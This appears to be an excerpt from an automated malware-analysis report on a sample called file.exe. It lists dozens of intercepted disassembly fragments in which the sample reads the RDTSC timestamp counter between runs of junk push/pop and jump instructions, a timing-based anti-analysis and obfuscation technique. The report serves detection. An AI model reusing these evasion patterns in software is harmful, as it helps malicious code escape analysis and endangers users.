              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2AA5 second address: 2C2AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F0CB0E1B265h 0x0000000b je 00007F0CB0E1B256h 0x00000011 jc 00007F0CB0E1B256h 0x00000017 jmp 00007F0CB0E1B267h 0x0000001c popad 0x0000001d pushad 0x0000001e push esi 0x0000001f pop esi 0x00000020 jmp 00007F0CB0E1B25Ah 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 popad 0x00000029 pushad 0x0000002a pushad 0x0000002b jg 00007F0CB0E1B256h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2AFF second address: 2C2B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0CB0C50342h 0x0000000a push ebx 0x0000000b jmp 00007F0CB0C50343h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2B2C second address: 2C2B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2B35 second address: 2C2B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2B3B second address: 2C2B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2E4E second address: 2C2E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2E54 second address: 2C2E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2E58 second address: 2C2E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2E5C second address: 2C2E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0CB0E1B266h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F0CB0E1B258h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2FFF second address: 2C3012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0CB0C50336h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0CB0C50336h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29880A second address: 298819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3141 second address: 2C314A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C314A second address: 2C319B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Eh 0x00000007 jmp 00007F0CB0E1B269h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0CB0E1B269h 0x00000016 jng 00007F0CB0E1B25Ah 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3A2A second address: 2C3A34 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0CB0C5033Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3B98 second address: 2C3BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F0CB0E1B256h 0x00000013 jg 00007F0CB0E1B256h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3EC6 second address: 2C3EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0CB0C50336h 0x0000000a jng 00007F0CB0C50336h 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3EDC second address: 2C3EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28E910 second address: 28E914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CAF72 second address: 2CAF7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CAF7C second address: 2CAF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CAF80 second address: 2CAF84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1CD second address: 2CB1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1D4 second address: 2CB1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1D9 second address: 2CB1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0CB0C5033Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1F4 second address: 2CB238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B263h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jng 00007F0CB0E1B260h 0x00000011 pushad 0x00000012 jne 00007F0CB0E1B256h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F0CB0E1B261h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE2F0 second address: 2CE308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50344h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE4AE second address: 2CE4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007F0CB0E1B26Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE4BB second address: 2CE4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C50342h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE60F second address: 2CE61B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F0CB0E1B256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE61B second address: 2CE625 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE625 second address: 2CE629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE629 second address: 2CE63D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0CB0C50336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE63D second address: 2CE658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B267h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE658 second address: 2CE673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0CB0C50345h 0x0000000c jmp 00007F0CB0C5033Fh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE7E5 second address: 2CE7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007F0CB0E1B256h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE7F8 second address: 2CE7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE7FE second address: 2CE804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE804 second address: 2CE817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE817 second address: 2CE82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0CB0E1B25Ch 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE82B second address: 2CE82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE82F second address: 2CE846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F0CB0E1B256h 0x00000011 jc 00007F0CB0E1B256h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEE4C second address: 2CEE50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2C15 second address: 2D2C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B265h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2D1C second address: 2D2D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2D22 second address: 2D2D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2D26 second address: 2D2D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2D35 second address: 2D2D3A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2DD5 second address: 2D2DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2DDA second address: 2D2DE4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0CB0E1B25Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3385 second address: 2D339B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0CB0C5033Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D339B second address: 2D33B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 mov dword ptr [ebp+12457067h], edi 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D33B0 second address: 2D33B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D33B4 second address: 2D33B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D33B8 second address: 2D33BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D343C second address: 2D3443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3798 second address: 2D37B2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0CB0C50336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0CB0C5033Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3844 second address: 2D3864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F0CB0E1B25Ah 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3D70 second address: 2D3D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3D74 second address: 2D3D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3D78 second address: 2D3D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3D82 second address: 2D3D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D587A second address: 2D587E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D587E second address: 2D5884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D61DC second address: 2D61E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D7993 second address: 2D799D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8498 second address: 2D84B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DA5D3 second address: 2DA5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DA5D9 second address: 2DA5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DAC4F second address: 2DAC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DAC53 second address: 2DACCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b mov bx, si 0x0000000e push 00000000h 0x00000010 mov ebx, dword ptr [ebp+122D3883h] 0x00000016 mov ebx, dword ptr [ebp+12469FF6h] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F0CB0C50338h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov bx, ACE7h 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e jmp 00007F0CB0C5033Ch 0x00000043 jc 00007F0CB0C5033Ch 0x00000049 jne 00007F0CB0C50336h 0x0000004f popad 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F0CB0C50340h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DACCB second address: 2DACD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DDE4C second address: 2DDE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFDCD second address: 2DFDE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFDE6 second address: 2DFDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFDEB second address: 2DFDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFDF1 second address: 2DFDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DBF50 second address: 2DBF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0F56 second address: 2E0F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0F5A second address: 2E0F6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B260h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DF052 second address: 2DF059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0F6E second address: 2E0F73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DF059 second address: 2DF07F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F0CB0C50338h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0F73 second address: 2E0FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0E1B25Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+12449B13h] 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+12447184h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F0CB0E1B258h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jg 00007F0CB0E1B258h 0x00000041 jns 00007F0CB0E1B262h 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0FDC second address: 2E0FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0FE1 second address: 2E0FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0CB0E1B263h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFFB6 second address: 2DFFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFFBB second address: 2DFFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B25Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFFCB second address: 2DFFCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E113D second address: 2E1141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E1141 second address: 2E11D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d sub ebx, 77CDD965h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov bx, 125Dh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov bx, ax 0x00000028 mov eax, dword ptr [ebp+122D11DDh] 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0CB0C50338h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov bx, di 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F0CB0C50338h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E2EAF second address: 2E2EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E11D6 second address: 2E11DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E11DB second address: 2E11E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
